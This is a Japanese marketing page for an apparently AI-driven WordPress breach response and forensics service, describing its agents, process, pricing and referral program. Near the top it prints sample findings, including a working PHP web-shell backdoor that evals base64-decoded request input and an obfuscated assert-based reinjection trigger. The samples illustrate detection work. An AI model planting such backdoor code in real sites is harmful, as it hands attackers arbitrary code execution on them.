フォレンジック調査・横展開リスク調査・個人情報保護法対応まで—— 「マルウェア除去だけで終わる」一般的な業者とは異なる、24体の専門AIエージェントによる完全並列調査。
URLを1行入力 · 平均15分以内に折り返し · 後払い対応
※ 上記は実対応案件の処理ログ再現(個別情報は匿名化)
掲載・実績(順次公開予定)
※ 守秘義務契約のため、現時点では具体的な社名・機関名の公開を控えています。NDA締結後に詳細をご案内可能です。
復旧業者から「終わりました」と連絡が来たあと、 WP-AIレスキューに二次調査を依頼すると、 こういう 見落とし が出てきます。 実際の侵害現場で、AIエージェントが検出した3つのサンプル。
本サンプルは演習環境で実検出されたもの。アクセスログを精査しないと、設置と実行が一致せず見落とされる。
<?php
/* lk9d8f.php — 一見、単なる空ファイル。
実態は、攻撃者が任意のPHPコードを実行できるバックドア。 */
if (isset($_REQUEST["c"])) {
@eval(base64_decode($_REQUEST["c"]));
}
//↑ この3行で、サイト全体が攻撃者のものになる。「ファイル名は変えられない、中身だけ汚染」型。テーマ更新で消すと管理画面ごと壊れるため、行範囲特定が必須。
// — 末尾に静かに追記される、難読化された再注入トリガー —
$_HK = "Z3ppbmZsYXRl"; // = "gzinflate"
@${$_HK = base64_decode($_HK)}; // 動的関数解決
if (isset($_GET["x"]) && $_GET["x"] === "ping") {
@assert($_POST["p"] ?? "true"); // 任意コード実行
}ファイル系のスキャンだけでは絶対に見つからない。DBクエリでの直接照合が必要。
-- DB上の設定値が、ある日こうなっている。
SELECT option_name, option_value
FROM wp_options
WHERE option_name IN ('siteurl', 'home');
-- option_value がこっそり外部ドメインに書き換わると、
-- ログイン画面まで攻撃者制御サーバへリダイレクトされる。侵害は、「気付かれにくい場所」に潜む。
人手で1ファイルずつ目視している限り、必ず見落としは出ます。 24体のAIエージェントが 同時並列で 全ファイル・全DBレコード・全アクセスログを照合し、 「この行だけ怪しい」を漏らさず拾うのが、WP-AIレスキューのアプローチです。
これは、ある夜に動いた一件のフィールドレポートです(守秘義務のためサイト名・業種・URLは非公開)。 業界平均が「数日〜1週間」と言われる中で、 なぜこの時間で終わったのか。 4つの章に分けて、その夜の動きを追跡します。
顧客からSlackに一行: 『ログインできません、変なサイトに飛びます』。WATRIXのインシデントコマンダー(CMD)が起動、24体のAIエージェントが順次オンラインに。
WAFで攻撃元IP帯をブロック、wp-loginを一時的にIP制限、全ユーザーセッション破棄、WordPress SECRET KEY全更新。攻撃者の足場を1つずつ切っていく。
不正PHP3ファイル、不正DB管理者2名、不正wp_options 1件をすべて特定し除去。同FTPアカウント配下の他サイトにも同じ侵害が伝播していないか、横展開チェック。
脆弱なプラグインをアップデート、WAFルールを追加、二要素認証を全管理者に設定。同時に、フォレンジック報告書を作成(侵害経路・影響範囲・対応工程・再発防止策・タイムライン)。
「朝、出社したらサイトは普通に動いていて、 机の上に分厚い報告書が置いてあった。
何が起きたのかも、何をされたのかも、ぜんぶ分かった。
— Day 2 朝、顧客サイト管理者の証言
1つでも当てはまったら、サイトはすでに侵害されている可能性があります。今すぐ無料診断(WP-CLI と LOKI-RS による検査)をお試しください。
「専門用語が多くてよく分からない」という方も、ご安心ください。無料診断のフォームに サイトURL だけ入れていただければ、WATRIXが代わりに調べます。報告書もやさしい日本語でお返しします。
「マルウェア除去 + 復旧」で完了する一般的な業者では対応しきれない、
事業の生命線が侵害された企業のためのサービスです。
WordPress侵害への対応は、フォレンジック、封じ込め、ハードニング、法務対応、通知文作成、横展開リスク調査 など、専門領域が多岐に渡ります。
一人のエンジニアが順番に進めれば、抜け漏れも、時間のロスも生まれます。 WATRIXは 24体の専門AIエージェント を並列で走らせ、各領域の専門家が同時に対応する体制を再現しました。
CMD(インシデントコマンダー)を中心に、6種の専門エージェントとその補佐エージェント計24体が並列駆動
サーバ・データベース・ログから侵害の入口と経路を特定します
進行中の被害を止め、攻撃者のセッションと足場を切り離します
パッチ適用・権限見直し・WAF導入で再侵入の壁を築きます
個人情報保護法の通知義務、警察連携、契約上の責任範囲を整理します
ユーザー・取引先・関係者への謝罪文や告知文をやさしい日本語で起草します
同種攻撃の最新動向、IoC(攻撃指標)データベースとの照合を担当します
※ 残り18体は上記6種を補佐する専門エージェント(マルウェア解析、IPレピュテーション照合、DNS履歴調査、SSL/TLS診断、メールヘッダ解析、Cookie解析、CSP診断 ほか)で構成しています。
人間1人では数時間〜数日かかる作業を、AIエージェントの並列実行で 漏らさず・素早く。最終判断は必ず人間のエンジニアが行います。
場当たり的な対応では、また狙われます。WP-AIレスキューは、WordPress公式が推奨するインシデント対応プロセスを下敷きに、7つのフェーズへ体系化した手順で進めます。
症状の確認、侵害仮説の設定、対応優先度の決定
サーバ全体スキャン、不審ファイル・改ざんファイルの抽出
攻撃者のアクセス遮断、被害拡大の停止
全ユーザーの再ログイン強制、不正トークンの破棄
同サーバ他サイト、DB、メール、関連サービスへの波及確認
脆弱性パッチ、WAF導入、権限見直し、二要素認証の強制
ログ保全(改ざん検知用ハッシュ・タイムスタンプ付与)
手順は WordPress.org公式の Hardening WordPress および OWASP Incident Response のガイドラインを参照しています。日本の 個人情報保護法 に基づく通知義務にも対応できる証拠保全(Phase 7)を最後に必ず実施します。
緊急対応・調査・継続運用の3つから、状況に合わせてお選びいただけます。価格は 業界水準より50%高め に設定しています。理由は次のセクションで詳しくお伝えします。
侵害が確定済み、または強く疑われる方
経緯解明・報告書納品が目的の方
再侵入を防ぎたい方、継続的に守りたい方
※ 価格はサイト規模・侵害の深さ・サーバ環境により変動します。正式な見積は無料診断の結果に基づいてご提示します。
※ 紹介でのご依頼は 20%キャッシュバック 対象です(パートナープログラム参照)。
WP-AIレスキューは「マルウェア除去 + 復旧」止まりの一般的な業者ではありません。フォレンジック調査 + 復旧 + 法務対応 までを24体のAIエージェントが並列で進める、 事業の生命線が侵害された企業向けのプレミアムサービスです。
業界の多くは「不正ファイル除去 → 復旧」までで完了します。WP-AIレスキューは、そこに加えて A4 15〜30ページのフォレンジック報告書、横展開リスク調査、個人情報保護法72時間報告対応、警察被害届支援まで標準でカバーします。
人間1人で検査すれば、疲労・経験差・優先順位の判断ミスで必ず漏れが生まれます。WATRIXは24体の専門AIエージェントを並列で動かし、各エージェントが互いの作業をクロスチェックします。漏れない仕組みに投資した分が、価格に反映されています。
個人情報を扱う、決済を持つ、BtoB信用が重要——そんな事業者にとって、WordPress侵害は事業継続そのものを脅かします。徹底的な対応コストは、二次被害のリスクと比べれば桁が違います。WP-AIレスキューは、そのレベルの事業者に向けた専門サービスです。
雑な対応で見落としがあると、数日〜数週間後に再侵入が起きます。その時の損失試算(中小ECサイトの想定):
| サイト停止による売上損失(1週間) | 100万〜500万円 |
| 個人情報漏洩通知(郵送+電話対応) | 50万〜200万円 |
| 個人情報保護委員会・警察対応 | 30万〜100万円 |
| 顧客流出による中長期的な売上減 | 数百万〜数千万円 |
| 信用失墜・レピュテーション回復施策 | 100万〜500万円 |
※ 2026年4月時点の公開事例・業界レポートをもとにWATRIXが作成した参考試算です。サイト規模・業種により大きく変動します。
| 項目 | 一般的な復旧業者 | WP-AIレスキュー |
|---|---|---|
| 対応の深さ | マルウェア除去 + 復旧 | フォレンジック調査 + 復旧 + 横展開調査 + 法務対応 |
| 報告書 | 簡易版(数ページ) | A4 15〜30ページの詳細フォレンジック報告書 |
| 並列処理 | 1〜2名のエンジニアが順次対応 | 24体のAIエージェントが並列 |
| 横展開リスク調査 | オプション扱い | 標準対応 |
| 個人情報保護法72時間報告対応 | 対応外が多数 | 標準サポート |
| 警察被害届の支援 | 対応外が多数 | 報告書記載項目に沿った資料を提供 |
| 再侵入監視 | 別契約・別費用 | 30日間の能動的監視を含む |
| 想定対象 | 中小サイト・個人ブログ | 個人情報・決済・信用が事業の生命線となる事業者 |
※ 「一般的な復旧業者」は当社調べ(2026年5月時点、国内主要復旧業者5社の公表サービス内容を集計)。
「一度きりの侵害対応」で、また数ヶ月後に同じ目に遭うのか。
「徹底的に漏れなく対応」で、安心して本業に戻るのか。
WATRIXは、後者を必要とする事業者だけに向けたサービスです。
「自社では緊急対応の専門部隊を持てない。でも、お得意先からSOSが来たら断りたくない」—— そんな Web制作会社・サーバ会社・コンサル会社の方へ、パートナープログラムをご用意しました。
ご紹介いただいた案件のサービス料金から、20%を紹介報酬としてお支払いします。例: 緊急復旧パック ¥80万円のご紹介 → ¥16万円がパートナー様へ。
希望に応じて、対応プロセスを共同で進められます。WATRIXのAIエージェントが解析した結果や対応手順を、貴社のエンジニアと共有しながら復旧。緊急対応のノウハウが、貴社内にも蓄積していきます。
緊急時に対応できないと、顧客は他社に流れます。WP-AIレスキューにバトンを渡せば、復旧後の運用は貴社に戻せます。WATRIXは、競合提案を一切しません。
URLを1行入れていただくだけで、WATRIXが状況を判断します。
15分以内に担当者から折り返しご連絡します。
症状の詳細を教えてください。
24時間以内に着手します(緊急復旧パックの場合)。
| 会社名 | WATRIX合同会社(ワトリックス) |
|---|---|
| 設立 | 2019年6月4日 |
| 代表 | 代表社員 高橋 航 |
| 所在地 | 東京都江戸川区清新町一丁目4番7-1406号 |
| 事業内容 | 業務改善につながるWeb・システム・AIの開発 |
| ミッション | 伴走型 社外IT部門 |
WATRIXは「伴走型 社外IT部門」をミッションに、IT部門を持たない中小企業に、まるで社内にIT部門があるかのような安心感をお届けしています。
WP-AIレスキューは、その中でも「もっとも緊急度の高い瞬間」に立ち会うサービスです。復旧後も、月次運用や日常のIT相談で、長くお付き合いいただければ幸いです。